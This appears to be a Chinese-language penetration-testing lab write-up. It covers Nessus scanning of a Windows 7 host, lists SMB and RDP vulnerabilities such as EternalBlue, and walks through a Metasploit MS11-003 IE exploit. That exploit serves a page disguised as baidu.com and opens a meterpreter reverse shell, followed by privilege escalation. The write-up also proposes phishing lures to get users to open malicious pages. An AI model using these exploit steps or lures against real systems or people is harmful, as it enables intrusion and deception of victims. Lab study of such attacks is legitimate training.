1)嘗試使用Nessus對Android設(shè)備和Cisco路由器進(jìn)行掃描,并分析掃描結(jié)果?
2)查閱微軟漏洞更新信息,有哪些重大的漏洞能攻破未打任何補(bǔ)丁的win7系統(tǒng)?
3)思考如何設(shè)計誘騙策略來提高目標(biāo)用戶點(diǎn)擊我們構(gòu)造的惡意網(wǎng)頁的幾率?
2:MS17-010遠(yuǎn)程溢出
MS17-010漏洞出現(xiàn)在Windows SMB v1中的內(nèi)核態(tài)函數(shù)srv!SrvOs2FeaListToNt在處理FEA(File Extended Attributes)轉(zhuǎn)換時,在大非分頁池(Large Non-Paged Kernel Pool)上存在緩沖區(qū)溢出。
函數(shù)srv!SrvOs2FeaListToNt在將FEA list轉(zhuǎn)換成NTFEA(Windows NT FEA) list前會調(diào)用。srv!SrvOs2FeaListSizeToNt去計算轉(zhuǎn)換后的FEA lsit的大小,因計算大小錯誤,而導(dǎo)致緩沖區(qū)溢出。
CVE-2017-0144 EternalBlue(永恒之藍(lán))
EternalBlue(永恒之藍(lán))據(jù)稱是方程式組織在其漏洞利用框架中一個針對SMB服務(wù)進(jìn)行攻擊的模塊,由于其涉及漏洞的影響廣泛性及利用穩(wěn)定性,在被公開以后為破壞性巨大的勒索蠕蟲 WannaCry所用而名噪一時。360威脅情報中心對于WannaCry的活動持續(xù)地進(jìn)行著監(jiān)控,我們看到的趨勢是 WannaCry的感染量還在增加,說明作為蠕蟲主要傳播手段的EternalBlue相應(yīng)的漏洞還大量存在著。但是,對于EternalBlue 這個攻擊利器本身的技術(shù)分析在公開渠道上看到的討論其實(shí)并不充分,本文嘗試通過一個較完全的分析梳理相關(guān)的細(xì)節(jié),揭示其成因和相應(yīng)的利用技巧。
漏洞編號
CVE-2017-0145
CVE-2017-0146
CVE-2017-0147?
CVE-2017-0148?
CVE-2017-11780?
CVE-2019-0708?
CVE-2019-1181?
CVE-2019-1182?
3:我們可以把惡意網(wǎng)頁外觀包裝成人們平時正常使用的一些軟件。同時可以通過發(fā)送誘騙郵件,有道人們主動打開網(wǎng)頁。
Nessus基本介紹
Nessus是一個功能強(qiáng)大而又易于使用的網(wǎng)絡(luò)和主機(jī)漏洞評估工具,分為免費(fèi)的家庭版和付費(fèi)的企業(yè)版。Nessus6.0以后采取Browser/Server模式,Server端負(fù)責(zé)進(jìn)行安全檢查、具體的掃描任務(wù),客戶端用來配置管理服務(wù)器端。服務(wù)端采用plug-in的體系,允許用戶加入執(zhí)行特定功能的插件,這插件可以進(jìn)行更快速和更復(fù)雜的安全檢查。Nessus自帶大量安全檢查插件能夠滿足一般用戶的安全評估任務(wù)需要,如果有特殊需要也可以將自己開發(fā)的安全檢查插件集成到Nessus中。
和其他安全掃描工具相比,Nessus主要優(yōu)勢在于免費(fèi)、擴(kuò)展性強(qiáng),容易使用以及能夠?qū)δ繕?biāo)系統(tǒng)進(jìn)行全面的漏洞掃描。
默認(rèn)狀態(tài)下, Nessus安裝成功后會開機(jī)自啟動,用戶使用安裝時配置的賬號登陸其管理界面,添加掃描任務(wù),根據(jù)相關(guān)需要對掃描任務(wù)的相關(guān)屬性進(jìn)行詳細(xì)的配置。等掃描完成以后,會生成一份詳細(xì)的報告,報告里會將掃描結(jié)果按照危險系數(shù)高低分成高危漏洞、中危漏洞、低危漏洞三類,我們一般重點(diǎn)關(guān)注高危漏洞,中危漏洞利用條件會比較苛刻,低危漏洞基本沒有利用的可能。查看高危漏洞詳情,根據(jù)漏洞簡介信息使用google搜索是否存在已知的Exp和攻擊方法可以提高安全測試效率。
通過該實(shí)驗熟悉Nessus漏洞掃描工具的安裝和主機(jī)漏洞掃描的方法,學(xué)會利用Nessus掃描結(jié)果篩選合適的Metasploit攻擊模塊進(jìn)行安全測試、攻擊。
圖1 實(shí)驗拓?fù)鋱D
漏洞主機(jī):win7,IP地址:10.1.1.129
攻擊主機(jī):Kali linux,IP地址:10.1.1.128
初步了解實(shí)驗環(huán)境及Nessus安裝(實(shí)驗步驟一操作已全部完成,實(shí)驗環(huán)境內(nèi)的操作從實(shí)驗步驟二開始)
1.查看win7漏洞主機(jī)的登錄用戶及網(wǎng)絡(luò)配置信息,從下圖2可以看出漏洞主機(jī)IP為10.1.1.129。使用命令如下:
ipconfig???查看網(wǎng)絡(luò)配置信息
?
?
2.為了更好的演示攻擊win7系統(tǒng)實(shí)例需要關(guān)閉win7系統(tǒng)的防火墻,win+R輸入cmd,運(yùn)行“netsh firewall set opmode mode=disable”命令
?
?
?
?
3.查看攻擊者主機(jī)登陸用戶及網(wǎng)絡(luò)配置信息,從下圖3可以看出攻擊主機(jī)登陸用戶為root ,IP為10.1.1.128
whoami????查看當(dāng)前登陸用戶
ifconfig????查看網(wǎng)絡(luò)配置信息
?
?
?
4.在Nessus官網(wǎng)下載頁面選擇適合Kali linux的安裝程序。經(jīng)實(shí)驗證明多個版本的都可以在kali linux上安裝成功,這里選擇“Debian 6,7,8,9/Kali Linux 1,2017.3 AMD64”版本程序。下載之后,拷貝到Kali linux主機(jī)上,運(yùn)行下列命令進(jìn)行安裝:
dpkg -i Nessus-8.9.1-debian6_amd64.deb 安裝Debian安裝包
新建一個掃描,依次選擇“New Scan”-“Basic Network Scan”,如下圖所示。
?
新建一個掃描,依次選擇“New Scan”-“Basic Network Scan”,如下圖所示。
?
配置掃描信息,主要設(shè)置掃描名稱、描述和掃描目標(biāo)三個信息即可,其他配置選擇默認(rèn),配置完成點(diǎn)擊Save。選擇對整個10.1.1.0/24網(wǎng)段進(jìn)行掃描,如下圖所示。
?
?
掃描結(jié)束后,Nessus會很直觀的顯示出目標(biāo)網(wǎng)段的安全情況。下圖顯示了整個網(wǎng)段的安全信息。Nessus將安全問題歸類為Info/Low/Medium/High/Critical五個等級,其中Critical等級的問題是最危險的,Info級別的問題通常是無關(guān)痛癢的信息顯示問題。
?
?
?
10.1.1.129主機(jī)漏洞概況
選中高危漏洞,Nessus給出了該漏洞的介紹、風(fēng)險信息、解決方案等詳細(xì)信息。Risk information對于攻擊者來說非常有用,可以根據(jù)Risk information去Google搜索是否存在已知的漏洞利用Exp。
?
?
MS11-030漏洞詳情
?
?
?
實(shí)驗步驟三
利用MS11_003 IE漏洞攻擊win7主機(jī)
步驟二中掃描得到win7主機(jī)系統(tǒng)存在MS11_030解析漏洞,但是該漏洞利用條件較為苛刻,因此選擇MS11_003 IE CSS Import漏洞來演示如何通過誘騙攻擊者點(diǎn)擊我們精心構(gòu)造的含有攻擊代碼的網(wǎng)頁來實(shí)現(xiàn)系統(tǒng)入侵。
1.在kali中執(zhí)行“msfconsole”,啟動metasploit
?
?2.運(yùn)行命令:“use exploit/windows/browser/ms11_003_ie_css_import”選擇漏洞利用EXP
檢查是否存在該漏洞
?
?3.運(yùn)行命令:show options,查看配置選項
?
?
?
?
4.設(shè)置生成的惡意網(wǎng)頁的URI為baidu.com
運(yùn)行命令:set URIPATH baidu.com
?
5.為防止服務(wù)器端口沖突,設(shè)置服務(wù)器端口為8060,避開常用端口8080
?
運(yùn)行命令:set SRVPORT 8060
?
6.設(shè)置攻擊負(fù)載
運(yùn)行命令:set PAYLOAD windows/meterpreter/reverse_tcp
?
?查看還需要設(shè)置那些內(nèi)容
?
8.設(shè)置LHOST以綁定本地IP
set LHOST 10.1.1.128
?
9.為避免沖突設(shè)置LPORT
?
運(yùn)行命令:set LPORT 8866
10.運(yùn)行命令“exploit”開始進(jìn)行攻擊,生成惡意網(wǎng)頁和做好其他準(zhǔn)備,只等受害者訪問我們構(gòu)造的惡意網(wǎng)頁
?
?
?
11.在 Win7靶機(jī)打開IE,訪問http://10.1.1.128:8060/baidu.com,模擬受害者誤點(diǎn)擊網(wǎng)頁,靶機(jī)IE如下圖所示,攻擊者M(jìn)etasploit顯示如下圖所示信息表明攻擊成功。
?
?
?
?
?
?
12.驗證攻擊是否成功。列出當(dāng)前成功建立的回話,任意進(jìn)入一個回話,查看攻擊者的身份??梢試L試使用getsystem進(jìn)行進(jìn)一步的提權(quán),如果提權(quán)失敗則可以采取上傳提權(quán)exe程序進(jìn)行提權(quán)的方案獲得最高權(quán)限。
sessions???列出所有會話
sessions -i 1???進(jìn)入1號會話
getuid???查看當(dāng)前用戶
?
?
?
?
?
本文摘自 :https://www.cnblogs.com/